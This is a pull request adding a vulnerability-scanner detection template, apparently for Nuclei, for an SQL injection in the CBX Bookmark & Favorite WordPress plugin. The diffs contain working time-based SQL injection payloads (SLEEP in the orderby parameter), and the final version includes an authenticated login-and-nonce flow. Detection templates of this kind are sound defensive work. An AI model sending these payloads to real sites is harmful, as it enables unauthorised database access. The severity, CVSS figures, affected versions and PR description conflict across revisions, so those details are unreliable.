### PR TITLE
Add CVE-2025-13652 - CBX Bookmark & Favorite Plugin SQL Injection

### DIFF
--- a/http/cves/2025/CVE-2025-13652.yaml
+++ b/http/cves/2025/CVE-2025-13652.yaml
@@ -1,0 +1,39 @@
+id: CVE-2025-13652
+
+info:
+  name: CBX Bookmark & Favorite WordPress Plugin < 2.1.8 - SQL Injection
+  author: neosmith1
+  severity: critical
+  description: |
+    The CBX Bookmark & Favorite WordPress plugin before 2.1.8 is vulnerable to SQL Injection through the 'orderby' parameter. The parameter is not properly sanitized before being used in a SQL query, allowing unauthenticated attackers to execute arbitrary SQL commands.
+  remediation: |
+    Update the CBX Bookmark & Favorite plugin to version 2.1.8 or later.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-13652
+    - https://plugins.trac.wordpress.org/changeset/3413499/
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/a8839665-8f98-4c81-b234-9201236e0194?source=cve
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cwe-id: CWE-89
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: cbxwire
+    product: cbx-bookmark-favorite
+    shodan-query: http.component:"WordPress"
+  tags: cve,cve2025,wordpress,wp-plugin,sqli,cbx,wpscan,vuln
+
+http:
+  - raw:
+      - |
+        GET /wp-admin/admin-ajax.php?action=cbxbkm_get_bookmarks&orderby=1' AND SLEEP(5) AND '1'='1 HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration>=5'
+          - 'status_code == 200'
+        condition: and

--- a/http/cves/2025/CVE-2025-13652.yaml
+++ b/http/cves/2025/CVE-2025-13652.yaml
@@ -3,7 +3,7 @@ id: CVE-2025-13652
 info:
   name: CBX Bookmark & Favorite WordPress Plugin < 2.1.8 - Authenticated SQL Injection
   author: neosmith1
-  severity: critical
+  severity: medium
   description: |
     The CBX Bookmark & Favorite WordPress plugin before 2.1.8 is vulnerable to SQL Injection through the 'orderby' parameter. The parameter is not properly sanitized before being used in a SQL query. Exploitation requires at least subscriber-level WordPress authentication.
   remediation: |
@@ -13,8 +13,8 @@ info:
     - https://plugins.trac.wordpress.org/changeset/3413499/
     - https://www.wordfence.com/threat-intel/vulnerabilities/id/a8839665-8f98-4c81-b234-9201236e0194?source=cve
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 9.8
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 6.5
     cwe-id: CWE-89
   metadata:
     verified: true

--- a/http/cves/2025/CVE-2025-13652.yaml
+++ b/http/cves/2025/CVE-2025-13652.yaml
@@ -1,11 +1,11 @@
 id: CVE-2025-13652
 
 info:
-  name: CBX Bookmark & Favorite WordPress Plugin < 2.1.8 - SQL Injection
+  name: CBX Bookmark & Favorite WordPress Plugin < 2.1.8 - Authenticated SQL Injection
   author: neosmith1
   severity: critical
   description: |
-    The CBX Bookmark & Favorite WordPress plugin before 2.1.8 is vulnerable to SQL Injection through the 'orderby' parameter. The parameter is not properly sanitized before being used in a SQL query, allowing unauthenticated attackers to execute arbitrary SQL commands.
+    The CBX Bookmark & Favorite WordPress plugin before 2.1.8 is vulnerable to SQL Injection through the 'orderby' parameter. The parameter is not properly sanitized before being used in a SQL query. Exploitation requires at least subscriber-level WordPress authentication.
   remediation: |
     Update the CBX Bookmark & Favorite plugin to version 2.1.8 or later.
   reference:
@@ -22,7 +22,7 @@ info:
     vendor: cbxwire
     product: cbx-bookmark-favorite
     shodan-query: http.component:"WordPress"
-  tags: cve,cve2025,wordpress,wp-plugin,sqli,cbx,wpscan,vuln
+  tags: cve,cve2025,wordpress,wp-plugin,sqli,cbx,wpscan,vuln,authenticated
 
 http:
   - raw:

--- a/http/cves/2025/CVE-2025-13652.yaml
+++ b/http/cves/2025/CVE-2025-13652.yaml
@@ -13,7 +13,7 @@ info:
     - https://plugins.trac.wordpress.org/changeset/3413499/
     - https://www.wordfence.com/threat-intel/vulnerabilities/id/a8839665-8f98-4c81-b234-9201236e0194?source=cve
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 6.5
     cwe-id: CWE-89
   metadata:

--- a/http/cves/2025/CVE-2025-13652.yaml
+++ b/http/cves/2025/CVE-2025-13652.yaml
@@ -1,39 +1,104 @@
 id: CVE-2025-13652
 
 info:
-  name: CBX Bookmark & Favorite WordPress Plugin < 2.1.8 - Authenticated SQL Injection
+  name: WordPress CBX Bookmark & Favorite Plugin <= 2.0.4 - SQL Injection
   author: neosmith1
-  severity: medium
+  severity: critical
   description: |
-    The CBX Bookmark & Favorite WordPress plugin before 2.1.8 is vulnerable to SQL Injection through the 'orderby' parameter. The parameter is not properly sanitized before being used in a SQL query. Exploitation requires at least subscriber-level WordPress authentication.
+    CBX Bookmark & Favorite WordPress plugin <= 2.0.4 contains a SQL injection caused by insufficient escaping of the 'orderby' parameter, letting authenticated attackers with Subscriber-level access extract sensitive database information
+  impact: |
+    Authenticated attackers can extract sensitive database information, potentially compromising user data confidentiality.
   remediation: |
-    Update the CBX Bookmark & Favorite plugin to version 2.1.8 or later.
+   Update to a version later than 2.0.4 or the latest available version.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2025-13652
-    - https://plugins.trac.wordpress.org/changeset/3413499/
-    - https://www.wordfence.com/threat-intel/vulnerabilities/id/a8839665-8f98-4c81-b234-9201236e0194?source=cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cbxwpbookmark/cbx-bookmark-favorite-204-authenticated-subscriber-sql-injection
+    - https://plugins.trac.wordpress.org/changeset/3276203/cbxwpbookmark
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
-    cvss-score: 6.5
+    cvss-score: 9.1
+    cve-id: CVE-2025-13652
     cwe-id: CWE-89
+    epss-score: 0.04
   metadata:
     verified: true
-    max-request: 1
-    vendor: cbxwire
+    max-request: 3
+    vendor: codeboxr
     product: cbx-bookmark-favorite
-    shodan-query: http.component:"WordPress"
-  tags: cve,cve2025,wordpress,wp-plugin,sqli,cbx,wpscan,vuln,authenticated
+    fofa-query: body="cbxwpbookmark"
+    shodan-query: http.html:"cbxwpbookmark"
+  tags: cve,cve2025,wp-plugin,sqli,wordpress,cbxwpbookmark,authenticated,wp
+
+variables:
+  username: "{{username}}"
+  password: "{{password}}"
+
+flow: http(1) && http(2) && http(3)
 
 http:
   - raw:
       - |
-        GET /wp-admin/admin-ajax.php?action=cbxbkm_get_bookmarks&orderby=1' AND SLEEP(5) AND '1'='1 HTTP/1.1
+        POST /wp-login.php HTTP/1.1
         Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP+Cookie+check
 
-    matchers-condition: and
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=%2F&testcookie=1
+
+    extractors:
+      - type: regex
+        name: wp_cookie
+        group: 1
+        regex:
+          - '(wordpress_logged_in[^;\r\n]+)'
+        part: header
+        internal: true
+
     matchers:
       - type: dsl
         dsl:
-          - 'duration>=5'
-          - 'status_code == 200'
+          - status_code == 302
+          - contains(header, "wordpress_logged_in")
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: {{wp_cookie}}
+
+    extractors:
+      - type: regex
+        name: nonce
+        group: 1
+        regex:
+          - 'var\s+cbxwpbookmark\s*=\s*\{[^}]*?"nonce"\s*:\s*"([a-z0-9]+)"'
+        part: body
+        internal: true
+
+    matchers:
+      - type: dsl
+        dsl:
+          - status_code == 200
+          - contains(body, "cbxwpbookmark")
+          - nonce != ""
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        @timeout: 30s
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: {{wp_cookie}}
+
+        action=cbx_bookmark_loadmore&security={{nonce}}&limit=10&offset=0&userid=1&orderby=(SELECT+1+FROM+(SELECT+SLEEP(6))x)&order=DESC
+
+    matchers:
+      - type: dsl
+        dsl:
+          - duration >= 6
+          - status_code == 200
         condition: and


### PR DESCRIPTION
## CVE-2025-13652: CBX Bookmark & Favorite Plugin SQL Injection

Adds detection template for SQL Injection vulnerability in CBX Bookmark & Favorite WordPress plugin before version 2.1.8.

### Vulnerability Details
- **CVE**: CVE-2025-13652
- **Product**: CBX Bookmark & Favorite WordPress Plugin
- **Affected Versions**: < 2.1.8
- **Vulnerability Type**: SQL Injection (CWE-89)
- **CVSS Score**: 9.8 Critical

### Detection Method
- Tests the `orderby` parameter in the `cbxbkm_get_bookmarks` AJAX action
- Uses time-based blind SQL injection (SLEEP)
- Detection requires 5+ second response delay

### References
- https://nvd.nist.gov/vuln/detail/CVE-2025-13652
- https://plugins.trac.wordpress.org/changeset/3413499/
- https://www.wordfence.com/threat-intel/vulnerabilities/id/a8839665-8f98-4c81-b234-9201236e0194